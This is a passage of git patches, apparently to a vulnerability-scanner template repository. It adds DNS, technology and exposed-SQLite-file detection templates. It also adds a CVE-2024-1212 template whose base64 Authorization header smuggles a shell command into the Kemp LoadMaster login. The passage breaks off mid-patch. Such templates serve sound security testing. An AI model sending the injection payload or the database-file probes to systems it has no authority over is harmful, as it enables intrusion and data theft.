From 183277a771f53f32704767cd4a0e6b0b1eb561bd Mon Sep 17 00:00:00 2001 From: Rishi Date: Sat, 24 Feb 2024 14:28:56 +0000 Subject: [PATCH 01/53] spf record detection template --- dns/spf-record-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 dns/spf-record-detect.yaml diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml new file mode 100644 index 0000000000..3dca6d7520 --- /dev/null +++ b/dns/spf-record-detect.yaml @@ -0,0 +1,23 @@ +id: spf-record + +info: + name: SPF Record Detected + author: rxerium + severity: info + description: An SPF TXT record was detected + reference: + - https://www.mimecast.com/content/how-to-create-an-spf-txt-record + tags: dns,spf + +dns: + - name: "{{FQDN}}" + type: TXT + matchers: + - type: word + words: + - "v=spf1" + + extractors: + - type: regex + regex: + - "v=spf1(.+)" \ No newline at end of file From 51b06a5756890f2334b2147102b9d65ae759c6f8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 11 Mar 2024 09:56:31 +0530 Subject: [PATCH 02/53] fix-formatting --- dns/spf-record-detect.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/dns/spf-record-detect.yaml b/dns/spf-record-detect.yaml index 3dca6d7520..c5583ab23a 100644 --- a/dns/spf-record-detect.yaml +++ b/dns/spf-record-detect.yaml @@ -1,10 +1,11 @@ -id: spf-record +id: spf-record-detect info: - name: SPF Record Detected + name: SPF Record - Detection author: rxerium severity: info - description: An SPF TXT record was detected + description: | + An SPF TXT record was detected reference: - https://www.mimecast.com/content/how-to-create-an-spf-txt-record tags: dns,spf @@ -20,4 +21,4 @@ dns: extractors: - type: regex regex: - - "v=spf1(.+)" \ No newline at end of file + - "v=spf1(.+)" From 746631b37ffba4c0a9f897567b7ff06d61f79a9e Mon Sep 17 00:00:00 2001 From: Michal Mikolas Date: Wed, 13 Mar 2024 12:51:16 +0100 Subject: [PATCH 03/53] generic-db: Added checking of SQLite database files exposure. --- http/exposures/files/generic-db.yaml | 151 +++++++++++++++++++++++++++ 1 file changed, 151 insertions(+) create mode 100644 http/exposures/files/generic-db.yaml diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml new file mode 100644 index 0000000000..a464ea071e --- /dev/null +++ b/http/exposures/files/generic-db.yaml @@ -0,0 +1,151 @@ +id: generic-db + +info: + name: Generic DB file exposure + author: Michal Mikolas (nanuqcz) + severity: high + description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. + reference: + - https://laravel.com/docs/11.x/database#sqlite-configuration # database/database.sqlite + - https://laravel.com/docs/5.2/database # database/database.sqlite + - https://github.com/laracasts/larabook/blob/master/app/config/database.php#L51 # app/database/production.sqlite + - https://forum.codeigniter.com/post-389846.html # writable/db.sqlite3 + - https://github.com/codeigniter4projects/playground/blob/develop/.env.example#L33 # writable/database.db + - https://symfony.com/doc/current/doctrine.html#configuring-the-database # var/app.db + - https://symfony.com/doc/4.x/doctrine.html#configuring-the-database # var/app.db + - https://symfony.com/doc/3.x/doctrine.html # app/sqlite.db + - https://symfony.com/doc/2.x/doctrine.html # sqlite.db + - https://openclassrooms.com/forum/sujet/symfony3-sqlite-could-not-create-database # var/data/db.sqlite + - https://symfony.com/doc/current/reference/configuration/doctrine.html#doctrine-dbal-configuration # var/data/data.sqlite + - https://stackoverflow.com/questions/31762878/sqlite-3-database-with-django # db.sqlite3 + - https://medium.com/@codewithbushra/using-sqlite-as-a-database-backend-in-django-projects-code-with-bushra-d23e3100686e # db.sqlite3 + - https://gist.github.com/jwo/4512764?permalink_comment_id=2235763#gistcomment-2235763 # db/production.sqlite3 + - https://stackoverflow.com/a/30345819/1632572 # db/production.sqlite3 + - https://developerhowto.com/2018/12/29/build-a-rest-api-with-node-js-and-express-js/ # db.sqlite + - https://sqldocs.org/sqlite/sqlite-nodejs/ # mydb.sqlite + - https://stackoverflow.com/questions/41620788/error-database-connection-sqlite-is-missing-or-could-not-be-created-cakephp # app/data/app_db.sqlite + - https://stackoverflow.com/questions/2722383/using-sqlite3-with-cakephp # app/webroot/database.sqlite, app/database.sqlite + - https://levelup.gitconnected.com/how-to-connect-and-use-the-sqlite-database-in-codeigniter-3-48cd50d3e78d # application/databases/db.sqlite + - https://turmanauli.medium.com/how-to-connect-codeigniter-to-sqlite3-database-like-a-pro-2177497a6d30 # application/db/database.sqlite + - https://forum.codeigniter.com/thread-74522.html # application/Database/db1.db + - https://stackoverflow.com/a/37088960/1632572 # application/database/data.db + - https://docs.laminas.dev/tutorials/getting-started/database-and-models/ # data/*.db + - https://phalcon-nucleon.github.io/#!database/getting-started.html # storage/database/database.sqlite + - https://www.yiiframework.com/doc/blog/1.1/en/prototype.database # protected/data/*.db + - https://pusher.com/tutorials/rest-api-slim-part-1/ # db/database.db + - https://www.digitalocean.com/community/tutorials/how-to-use-the-fat-free-php-framework # db/database.sqlite + - https://doc.nette.org/en/database/configuration#toc-single-connection # app/Model/*.db + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + metadata: + verified: true + tags: database,exposure,sqlite,sqlite3 + +http: + - method: GET + path: + # Recommended paths found in framework official docs or unofficial tutorials + - "{{BaseURL}}/database/database.sqlite" + - "{{BaseURL}}/database/production.sqlite" + - "{{BaseURL}}/app/database/production.sqlite" + - "{{BaseURL}}/writable/db.sqlite3" + - "{{BaseURL}}/writable/database.db" + - "{{BaseURL}}/var/app.db" + - "{{BaseURL}}/var/data/db.sqlite" + - "{{BaseURL}}/var/data/data.sqlite" + - "{{BaseURL}}/app/sqlite.db" + - "{{BaseURL}}/sqlite.db" + - "{{BaseURL}}/db.sqlite3" + - "{{BaseURL}}/db/production.sqlite3" + - "{{BaseURL}}/db.sqlite" + - "{{BaseURL}}/mydb.sqlite" + - "{{BaseURL}}/app/data/app_db.sqlite" + - "{{BaseURL}}/app/webroot/database.sqlite" + - "{{BaseURL}}/app/database.sqlite" + - "{{BaseURL}}/application/databases/db.sqlite" + - "{{BaseURL}}/application/db/database.sqlite" + - "{{BaseURL}}/application/Database/db1.db" + - "{{BaseURL}}/application/database/data.db" + - "{{BaseURL}}/data/app.db" + - "{{BaseURL}}/data/sqlite.db" + - "{{BaseURL}}/data/sqlite3.db" + - "{{BaseURL}}/data/database.db" + - "{{BaseURL}}/data/production.db" + - "{{BaseURL}}/storage/database/database.sqlite" + - "{{BaseURL}}/protected/data/app.db" + - "{{BaseURL}}/protected/data/sqlite.db" + - "{{BaseURL}}/protected/data/sqlite3.db" + - "{{BaseURL}}/protected/data/database.db" + - "{{BaseURL}}/protected/data/production.db" + - "{{BaseURL}}/db/database.db" + - "{{BaseURL}}/db/database.sqlite" + - "{{BaseURL}}/app/Model/app.db" + - "{{BaseURL}}/app/Model/sqlite.db" + - "{{BaseURL}}/app/Model/sqlite3.db" + - "{{BaseURL}}/app/Model/database.db" + - "{{BaseURL}}/app/Model/production.db" + + # General paths + - "{{BaseURL}}/app.db" + - "{{BaseURL}}/sqlite3.db" + - "{{BaseURL}}/app.sqlite" + - "{{BaseURL}}/app.sqlite3" + - "{{BaseURL}}/database.db" + - "{{BaseURL}}/database.sqlite" + - "{{BaseURL}}/database.sqlite3" + - "{{BaseURL}}/production.db" + - "{{BaseURL}}/production.sqlite" + - "{{BaseURL}}/production.sqlite3" + - "{{BaseURL}}/db/db.sqlite" + - "{{BaseURL}}/db/db.sqlite3" + - "{{BaseURL}}/db/sqlite.db" + - "{{BaseURL}}/db/sqlite3.db" + - "{{BaseURL}}/db/app.db" + - "{{BaseURL}}/db/app.sqlite" + - "{{BaseURL}}/db/app.sqlite3" + - "{{BaseURL}}/db/database.sqlite3" + - "{{BaseURL}}/db/production.db" + - "{{BaseURL}}/db/production.sqlite" + - "{{BaseURL}}/app/db.sqlite" + - "{{BaseURL}}/app/db.sqlite3" + - "{{BaseURL}}/app/sqlite3.db" + - "{{BaseURL}}/app/app.db" + - "{{BaseURL}}/app/app.sqlite" + - "{{BaseURL}}/app/app.sqlite3" + - "{{BaseURL}}/app/database.db" + - "{{BaseURL}}/app/database.sqlite3" + - "{{BaseURL}}/app/production.db" + - "{{BaseURL}}/app/production.sqlite" + - "{{BaseURL}}/app/production.sqlite3" + - "{{BaseURL}}/data/db.sqlite" + - "{{BaseURL}}/data/db.sqlite3" + - "{{BaseURL}}/data/app.sqlite" + - "{{BaseURL}}/data/app.sqlite3" + - "{{BaseURL}}/data/database.sqlite" + - "{{BaseURL}}/data/database.sqlite3" + - "{{BaseURL}}/data/production.sqlite" + - "{{BaseURL}}/data/production.sqlite3" + - "{{BaseURL}}/database/db.sqlite" + - "{{BaseURL}}/database/db.sqlite3" + - "{{BaseURL}}/database/sqlite.db" + - "{{BaseURL}}/database/sqlite3.db" + - "{{BaseURL}}/database/app.db" + - "{{BaseURL}}/database/app.sqlite" + - "{{BaseURL}}/database/app.sqlite3" + - "{{BaseURL}}/database/database.db" + - "{{BaseURL}}/database/database.sqlite3" + - "{{BaseURL}}/database/production.db" + - "{{BaseURL}}/database/production.sqlite3" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + negative: true + words: + - " Date: Fri, 15 Mar 2024 18:15:11 +0530 Subject: [PATCH 04/53] Create wing-ftp-service-detect.yaml --- .../technologies/wing-ftp-service-detect.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 http/technologies/wing-ftp-service-detect.yaml diff --git a/http/technologies/wing-ftp-service-detect.yaml b/http/technologies/wing-ftp-service-detect.yaml new file mode 100644 index 0000000000..0e444d1079 --- /dev/null +++ b/http/technologies/wing-ftp-service-detect.yaml @@ -0,0 +1,24 @@ +id: wing-ftp-service-detect + +info: + name: Wing FTP Service - Detect + author: ritikchaddha + severity: info + description: | + The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. + metadata: + max-request: 1 + verified: true + shodan-query: "Wing FTP Server" + tags: tech,ftp,wing,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "Wing FTP Server" From 30b2cc145bd81a8db4a8d485064086264682cf19 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:20:38 +0000 Subject: [PATCH 05/53] txt service detector --- dns/txt-service-detector.yaml | 218 ++++++++++++++++++++++++++++++++++ 1 file changed, 218 insertions(+) create mode 100644 dns/txt-service-detector.yaml diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml new file mode 100644 index 0000000000..2d35ce1e51 --- /dev/null +++ b/dns/txt-service-detector.yaml @@ -0,0 +1,218 @@ +id: txt-service-detector + +info: + name: DNS TXT Service Detector + author: rxerium + severity: info + description: Template to detect services associated with a domain through TXT records. + reference: + - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com + metadata: + max-request: 1 + tags: dns,txt + +dns: + - name: "{{FQDN}}" + type: TXT + + matchers-condition: or + matchers: + - type: word + name: "Keybase" + words: + - "keybase-site-verification" + + - type: word + name: "Proton Mail" + words: + - "protonmail-verification" + + - type: word + name: "Webex" + words: + - "webexdomainverification" + + - type: word + name: "Apple" + words: + - "apple-domain-verification" + + - type: word + name: "Facebook" + words: + - "facebook-domain-verification" + + - type: word + name: "Autodesk" + words: + - "autodesk-domain-verification" + + - type: word + name: "Stripe" + words: + - "stripe-verification" + + - type: word + name: "Atlassian" + words: + - "atlassian-domain-verification" + + - type: word + name: "Adobe Sign" + words: + - "adobe-sign-verification" + + - type: word + name: "Zoho" + words: + - "zoho-verification" + + - type: word + name: "Have I been Pwned" + words: + - "have-i-been-pwned-verification" + + - type: word + name: "KnowBe4" + words: + - "knowbe4-site-verification" + + - type: word + name: "Jamf" + words: + - "jamf-site-verification" + + - type: word + name: "Parallels" + words: + - "parallels-domain-verification" + + - type: word + name: "Dropbox" + words: + - "dropbox-domain-verification" + + - type: word + name: "VMWare Cloud" + words: + - "vmware-cloud-verification" + + - type: word + name: "Canva" + words: + - "canva-site-verification" + + - type: word + name: "MongoDB" + words: + - "mongodb-site-verification" + + - type: word + name: "Slack" + words: + - "slack-domain-verification" + + - type: word + name: "TeamViewer" + words: + - "teamviewer-sso-verification" + + - type: word + name: "Bugcrowd" + words: + - "bugcrowd-verification" + + - type: word + name: "Cisco" + words: + - "cisco-site-verification" + + - type: word + name: "Palo Alto Networks" + words: + - "paloaltonetworks-site-verification" + + - type: word + name: "Twilio" + words: + - "twilio-domain-verification" + + - type: word + name: "Dell Technologies" + words: + - "dell-technologies-domain-verification" + + - type: word + name: "1password" + words: + - "1password-site-verification" + + - type: word + name: "Duo" + words: + - "duo_sso_verification" + + - type: word + name: "Sophos" + words: + - "sophos-domain-verification" + + - type: word + name: "Pinterest" + words: + - "pinterest-site-verification" + + - type: word + name: "Citrix" + words: + - "citrix-verification-code" + + - type: word + name: "Zapier" + words: + - "zapier-domain-verification-challenge" + + - type: word + name: "Uber" + words: + - "uber-domain-verification" + + - type: word + name: "Zoom" + words: + - "zoom-domain-verification" + + - type: word + name: "Lastpass" + words: + - "lastpass-verification-code" + + - type: word + name: "Google Workspace" + words: + - "google-site-verification" + + - type: word + name: "Flexera" + words: + - "flexera-domain-verification" + + - type: word + name: "Yandex" + words: + - "yandex-verification" + + - type: word + name: "Calendly" + words: + - "calendly-site-verification" + + - type: word + name: "Docusign" + words: + - "docusign" + + - type: word + name: "Whimsical" + words: + - "whimsical" \ No newline at end of file From 2c9eae17f4a063c33d0bb43fa96f3981e9cf8077 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:26:20 +0000 Subject: [PATCH 06/53] remove trailing spaces --- dns/txt-service-detector.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml index 2d35ce1e51..55ea7d2e11 100644 --- a/dns/txt-service-detector.yaml +++ b/dns/txt-service-detector.yaml @@ -101,7 +101,7 @@ dns: name: "Canva" words: - "canva-site-verification" - + - type: word name: "MongoDB" words: @@ -151,7 +151,7 @@ dns: name: "Duo" words: - "duo_sso_verification" - + - type: word name: "Sophos" words: @@ -201,7 +201,7 @@ dns: name: "Yandex" words: - "yandex-verification" - + - type: word name: "Calendly" words: From d95c5384653fbc8355995a5355f90bdc82b076a6 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:28:54 +0000 Subject: [PATCH 07/53] remove another trailing space --- dns/txt-service-detector.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detector.yaml index 55ea7d2e11..24aa069286 100644 --- a/dns/txt-service-detector.yaml +++ b/dns/txt-service-detector.yaml @@ -4,7 +4,7 @@ info: name: DNS TXT Service Detector author: rxerium severity: info - description: Template to detect services associated with a domain through TXT records. + description: Template to detect services associated with a domain through TXT records. reference: - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com metadata: From 39ad0b0f680f302a6a823e9f49fe64956fbd694f Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 17 Mar 2024 12:54:28 +0000 Subject: [PATCH 08/53] soa-detection --- dns/soa-detect.yaml | 79 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 dns/soa-detect.yaml diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml new file mode 100644 index 0000000000..d2fef30649 --- /dev/null +++ b/dns/soa-detect.yaml @@ -0,0 +1,79 @@ +id: soa-detect + +info: + name: SOA record service detection + author: rxerium + severity: info + description: Detects which domain provider a domain is using, detected through SOA records + reference: + - https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/ + metadata: + max-request: 1 + tags: dns,soa + +dns: + - name: "{{FQDN}}" + type: SOA + matchers-condition: or + matchers: + - type: word + name: "Cloudflare" + words: + - "dns.cloudflare.com" + + - type: word + name: "Amazon Web Services" + words: + - "awsdns" + + - type: word + name: "Akamai" + words: + - "hostmaster.akamai.com" + + - type: word + name: "Azure" + words: + - "azure-dns.com" + + - type: word + name: "NS1" + words: + - "nsone.net" + + - type: word + name: "Verizon" + words: + - "verizon.com" + + - type: word + name: "Google Cloud Platform" + words: + - "googledomains.com" + - "google.com" + + - type: word + name: "Alibaba" + words: + - "alibabadns.com" + + - type: word + name: "Safeway" + words: + - "safeway.com" + + - type: word + name: "Mark Monitor" + words: + - "markmonitor.com" + - "markmonitor.zone" + + - type: word + name: "Hetznet" + words: + - "hetzner.com" + + - type: word + name: "Edge Cast" + words: + - "edgecastdns.net" \ No newline at end of file From d81a235f973842fee38c116721cf5b691728f08c Mon Sep 17 00:00:00 2001 From: Michal Mikolas Date: Mon, 18 Mar 2024 21:37:49 +0100 Subject: [PATCH 09/53] generic-db: Added more exact matchers to make sure the exposured file is really SQLite file. --- http/exposures/files/generic-db.yaml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index a464ea071e..f1f4d041b6 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -35,6 +35,8 @@ info: - https://pusher.com/tutorials/rest-api-slim-part-1/ # db/database.db - https://www.digitalocean.com/community/tutorials/how-to-use-the-fat-free-php-framework # db/database.sqlite - https://doc.nette.org/en/database/configuration#toc-single-connection # app/Model/*.db + - https://www.sqlite.org/fileformat.html # SQLite file always starts with "SQLite format {sqlite_version}" + - https://en.wikipedia.org/wiki/List_of_file_signatures # SQLite binary signature: 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -144,8 +146,14 @@ http: status: - 200 + # SQLite file always starts with "SQLite format {sqlite_version}" - type: word part: body - negative: true words: - - " Date: Mon, 18 Mar 2024 22:51:49 +0100 Subject: [PATCH 10/53] generic-db: Improved SQLite file signature matcher to match exactly beginning of the document. --- http/exposures/files/generic-db.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index f1f4d041b6..811540a3c6 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -147,10 +147,9 @@ http: - 200 # SQLite file always starts with "SQLite format {sqlite_version}" - - type: word - part: body - words: - - "SQLite format " + - type: dsl + dsl: + - 'startswith(body, "SQLite format ")' # SQLite file usually contains "CREATE TABLE", meaning there is at least one table - type: word From cf48f45e13aedd538df34c5033f390dca36b7c9b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 19 Mar 2024 16:27:34 +0530 Subject: [PATCH 11/53] formatting --- dns/soa-detect.yaml | 34 +++++++++++++++++++--------------- 1 file changed, 19 insertions(+), 15 deletions(-) diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml index d2fef30649..eb6eda0782 100644 --- a/dns/soa-detect.yaml +++ b/dns/soa-detect.yaml @@ -1,79 +1,83 @@ id: soa-detect info: - name: SOA record service detection + name: SOA Record Service - Detection author: rxerium severity: info - description: Detects which domain provider a domain is using, detected through SOA records + description: | + Detects which domain provider a domain is using, detected through SOA records reference: - https://www.cloudflare.com/learning/dns/dns-records/dns-soa-record/ metadata: max-request: 1 + verified: true tags: dns,soa dns: - name: "{{FQDN}}" + type: SOA + matchers-condition: or matchers: - type: word - name: "Cloudflare" + name: "cloudflare" words: - "dns.cloudflare.com" - type: word - name: "Amazon Web Services" + name: "amazon-web-services" words: - "awsdns" - type: word - name: "Akamai" + name: "akamai" words: - "hostmaster.akamai.com" - type: word - name: "Azure" + name: "azure" words: - "azure-dns.com" - type: word - name: "NS1" + name: "ns1" words: - "nsone.net" - type: word - name: "Verizon" + name: "verizon" words: - "verizon.com" - type: word - name: "Google Cloud Platform" + name: "google-cloud-platform" words: - "googledomains.com" - "google.com" - type: word - name: "Alibaba" + name: "alibaba" words: - "alibabadns.com" - type: word - name: "Safeway" + name: "safeway" words: - "safeway.com" - type: word - name: "Mark Monitor" + name: "mark-monitor" words: - "markmonitor.com" - "markmonitor.zone" - type: word - name: "Hetznet" + name: "hetznet" words: - "hetzner.com" - type: word - name: "Edge Cast" + name: "edge-cast" words: - - "edgecastdns.net" \ No newline at end of file + - "edgecastdns.net" From cc690eb154d87f11a784f7f285af2df2504ed39e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 19 Mar 2024 16:37:00 +0530 Subject: [PATCH 12/53] fix formatting --- ...-detector.yaml => txt-service-detect.yaml} | 90 ++++++++++--------- 1 file changed, 46 insertions(+), 44 deletions(-) rename dns/{txt-service-detector.yaml => txt-service-detect.yaml} (70%) diff --git a/dns/txt-service-detector.yaml b/dns/txt-service-detect.yaml similarity index 70% rename from dns/txt-service-detector.yaml rename to dns/txt-service-detect.yaml index 24aa069286..d286a8d2fe 100644 --- a/dns/txt-service-detector.yaml +++ b/dns/txt-service-detect.yaml @@ -1,14 +1,16 @@ -id: txt-service-detector +id: txt-service-detect info: - name: DNS TXT Service Detector + name: DNS TXT Service - Detect author: rxerium severity: info - description: Template to detect services associated with a domain through TXT records. + description: | + Finding the services companies use via their TXT records. reference: - - https://www.abenezer.ca/blog/services-companies-use-txt-records?ref=upstract.com + - https://www.abenezer.ca/blog/services-companies-use-txt-records metadata: max-request: 1 + verified: true tags: dns,txt dns: @@ -18,127 +20,127 @@ dns: matchers-condition: or matchers: - type: word - name: "Keybase" + name: "keybase" words: - "keybase-site-verification" - type: word - name: "Proton Mail" + name: "proton-mail" words: - "protonmail-verification" - type: word - name: "Webex" + name: "webex" words: - "webexdomainverification" - type: word - name: "Apple" + name: "apple" words: - "apple-domain-verification" - type: word - name: "Facebook" + name: "facebook" words: - "facebook-domain-verification" - type: word - name: "Autodesk" + name: "autodesk" words: - "autodesk-domain-verification" - type: word - name: "Stripe" + name: "stripe" words: - "stripe-verification" - type: word - name: "Atlassian" + name: "atlassian" words: - "atlassian-domain-verification" - type: word - name: "Adobe Sign" + name: "adobe-sign" words: - "adobe-sign-verification" - type: word - name: "Zoho" + name: "zoho" words: - "zoho-verification" - type: word - name: "Have I been Pwned" + name: "have-i-been-pwned" words: - "have-i-been-pwned-verification" - type: word - name: "KnowBe4" + name: "knowbe4" words: - "knowbe4-site-verification" - type: word - name: "Jamf" + name: "jamf" words: - "jamf-site-verification" - type: word - name: "Parallels" + name: "parallels" words: - "parallels-domain-verification" - type: word - name: "Dropbox" + name: "dropbox" words: - "dropbox-domain-verification" - type: word - name: "VMWare Cloud" + name: "vmware-cloud" words: - "vmware-cloud-verification" - type: word - name: "Canva" + name: "canva" words: - "canva-site-verification" - type: word - name: "MongoDB" + name: "mongodb" words: - "mongodb-site-verification" - type: word - name: "Slack" + name: "slack" words: - "slack-domain-verification" - type: word - name: "TeamViewer" + name: "teamViewer" words: - "teamviewer-sso-verification" - type: word - name: "Bugcrowd" + name: "bugcrowd" words: - "bugcrowd-verification" - type: word - name: "Cisco" + name: "cisco" words: - "cisco-site-verification" - type: word - name: "Palo Alto Networks" + name: "palo-alto-networks" words: - "paloaltonetworks-site-verification" - type: word - name: "Twilio" + name: "twilio" words: - "twilio-domain-verification" - type: word - name: "Dell Technologies" + name: "dell-technologies" words: - "dell-technologies-domain-verification" @@ -148,71 +150,71 @@ dns: - "1password-site-verification" - type: word - name: "Duo" + name: "duo" words: - "duo_sso_verification" - type: word - name: "Sophos" + name: "sophos" words: - "sophos-domain-verification" - type: word - name: "Pinterest" + name: "pinterest" words: - "pinterest-site-verification" - type: word - name: "Citrix" + name: "citrix" words: - "citrix-verification-code" - type: word - name: "Zapier" + name: "zapier" words: - "zapier-domain-verification-challenge" - type: word - name: "Uber" + name: "uber" words: - "uber-domain-verification" - type: word - name: "Zoom" + name: "zoom" words: - "zoom-domain-verification" - type: word - name: "Lastpass" + name: "lastpass" words: - "lastpass-verification-code" - type: word - name: "Google Workspace" + name: "google-workspace" words: - "google-site-verification" - type: word - name: "Flexera" + name: "flexera" words: - "flexera-domain-verification" - type: word - name: "Yandex" + name: "yandex" words: - "yandex-verification" - type: word - name: "Calendly" + name: "calendly" words: - "calendly-site-verification" - type: word - name: "Docusign" + name: "docusign" words: - "docusign" - type: word - name: "Whimsical" + name: "whimsical" words: - - "whimsical" \ No newline at end of file + - "whimsical" From 4dd2cd8fec94c406eae548ef129340109c5a3bae Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 20 Mar 2024 01:19:14 +0530 Subject: [PATCH 13/53] Create CVE-2024-1212.yaml --- http/cves/2024/CVE-2024-1212.yaml | 47 +++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1212.yaml diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml new file mode 100644 index 0000000000..6068d1e1b0 --- /dev/null +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -0,0 +1,47 @@ +id: CVE-2024-1212 + +info: + name: Progress Kemp LoadMaster - Unauthenticated Command Injection + author: DhiyaneshDK + severity: critical + description: | + Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution. + reference: + - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster + - https://freeloadbalancer.com/ + - https://kemptechnologies.com/ + - https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212 + - https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-1212 + cwe-id: CWE-78 + epss-score: 0.00046 + epss-percentile: 0.13478 + metadata: + verified: true + max-request: 1 + shodan-query: html:"LoadMaster" + tags: cve,cve2024,progress,rce,loadmaster + +http: + - method: GET + path: + - "{{BaseURL}}/access/set?param=enableapi&value=1" + headers: + Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "bin" + - "mnt" + - "WWW-Authenticate: Basic" + condition: and + + - type: status + status: + - 200 From 717075e5b3a292a95612bb62de7ff3060e61b1ba Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 20 Mar 2024 09:33:12 +0530 Subject: [PATCH 14/53] Update generic-db.yaml --- http/exposures/files/generic-db.yaml | 24 ++++++++---------------- 1 file changed, 8 insertions(+), 16 deletions(-) diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index 811540a3c6..0ac1962fbf 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -1,7 +1,7 @@ id: generic-db info: - name: Generic DB file exposure + name: Generic Database File - Exposure author: Michal Mikolas (nanuqcz) severity: high description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. @@ -41,8 +41,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 metadata: - verified: true - tags: database,exposure,sqlite,sqlite3 + max-request: 89 + tags: files,database,exposure,sqlite,sqlite3 http: - method: GET @@ -140,19 +140,11 @@ http: - "{{BaseURL}}/database/production.db" - "{{BaseURL}}/database/production.sqlite3" - matchers-condition: and matchers: - - type: status - status: - - 200 - - # SQLite file always starts with "SQLite format {sqlite_version}" - type: dsl dsl: - - 'startswith(body, "SQLite format ")' - - # SQLite file usually contains "CREATE TABLE", meaning there is at least one table - - type: word - part: body - words: - - "CREATE TABLE " + - 'startswith(body, "SQLite")' # SQLite file always starts with "SQLite format {sqlite_version}" + - 'contains(body, "CREATE TABLE")' # SQLite file usually contains "CREATE TABLE", meaning there is at least one table + - '!contains(body, " Date: Wed, 20 Mar 2024 09:36:02 +0530 Subject: [PATCH 15/53] Update CVE-2024-1212.yaml --- http/cves/2024/CVE-2024-1212.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index 6068d1e1b0..f2464b4726 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -1,17 +1,16 @@ id: CVE-2024-1212 info: - name: Progress Kemp LoadMaster - Unauthenticated Command Injection + name: Progress Kemp LoadMaster - Command Injection author: DhiyaneshDK severity: critical description: | Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution. reference: - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster - - https://freeloadbalancer.com/ - - https://kemptechnologies.com/ - https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212 - https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212 + - https://nvd.nist.gov/vuln/detail/CVE-2024-1212 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 From 